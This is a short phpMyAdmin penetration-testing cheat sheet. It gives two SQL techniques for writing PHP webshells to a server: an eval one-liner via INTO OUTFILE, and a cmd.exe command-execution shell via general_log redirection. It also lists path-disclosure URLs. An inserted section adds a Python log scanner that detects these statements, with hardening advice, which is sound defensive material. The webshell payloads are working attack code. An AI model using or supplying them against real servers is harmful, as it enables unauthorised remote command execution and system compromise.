phpMyAdmin penetration testing

Writing a one-line webshell via phpMyAdmin

Method 1

select '<?php @eval($_POST[cmd])?>' into outfile ''

Method 2

set global general_log='on';
set global general_log_file='';
select '<?php $command=$_REQUEST[abc]; $wsh= new COM("WScript.shell"); $exec= $wsh->exec("cmd.exe /c ".$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput ?>';
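
Both methods above leave recognizable statements in any SQL audit trail. The following is an added detection example, not part of the original page: it scans query-log text for INTO OUTFILE/DUMPFILE writes and general_log redirection toward script files. The log layout, the sample paths and the extension list are constructed assumptions.

```python
import re

# Constructed sample lines in a simplified general-query-log style (assumption,
# not taken from the page); all paths are placeholders.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z 12 Query select 1
2024-01-01T10:00:05Z 12 Query select '<?php echo 1 ?>' into outfile '/srv/www/example/a.php'
2024-01-01T10:01:00Z 13 Query SET GLOBAL general_log='on'
2024-01-01T10:01:02Z 13 Query set global general_log_file = '/srv/www/example/log.php'
2024-01-01T10:02:00Z 14 Query set global general_log_file='/var/log/mysql/query.log'
2024-01-01T10:03:00Z 15 Query select name into outfile '/tmp/export.csv' from t
"""

# SELECT ... INTO OUTFILE/DUMPFILE '<path>'
OUTFILE_RE = re.compile(r"\binto\s+(?:outfile|dumpfile)\s+(['\"])(.*?)\1", re.I)
# SET GLOBAL general_log_file = '<path>'
LOGFILE_RE = re.compile(r"\bset\s+global\s+general_log_file\s*=\s*(['\"])(.*?)\1", re.I)
# SET GLOBAL general_log = on / 'on' / 1
LOGON_RE = re.compile(r"\bset\s+global\s+general_log\s*=\s*['\"]?(?:on|1)\b", re.I)
# Extensions a web server is likely to pass to an interpreter (assumed list).
SCRIPT_EXT = re.compile(r"\.(?:php\d?|phtml|phar|asp|aspx|jsp)$", re.I)


def scan(log_text):
    """Return (line_number, rule, target_path) for each suspicious statement."""
    findings = []
    for no, line in enumerate(log_text.splitlines(), 1):
        m = OUTFILE_RE.search(line)
        # A file export is suspicious when it targets a script file or
        # when the statement itself carries a server-side script tag.
        if m and (SCRIPT_EXT.search(m.group(2)) or "<?" in line):
            findings.append((no, "outfile-to-script", m.group(2)))
        m = LOGFILE_RE.search(line)
        # Pointing the query log at a script file turns every logged query
        # into file content the web server may execute.
        if m and SCRIPT_EXT.search(m.group(2)):
            findings.append((no, "general-log-to-script", m.group(2)))
        # Runtime enabling of the general log is reported for correlation.
        if LOGON_RE.search(line):
            findings.append((no, "general-log-enabled", ""))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

On the server side, secure_file_priv restricts where INTO OUTFILE can write, and the account phpMyAdmin connects with should hold neither FILE nor the privilege needed to SET GLOBAL variables.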

phpMyAdmin path disclosure

1. /phpmyadmin/libraries/lect_lang.lib.php
2. /phpMyAdmin/index.php?lang[]=1
3. /phpMyAdmin/phpinfo.php
4. load_file()
5. /phpmyadmin/themes/darkblue_orange/layout.inc.php
6. /phpmyadmin/libraries/select_lang.lib.php
7. /phpmyadmin/libraries/lect_lang.lib.php
8. /phpmyadmin/libraries/mcrypt.lib.php

MySQL installation path

show variables like "%char%";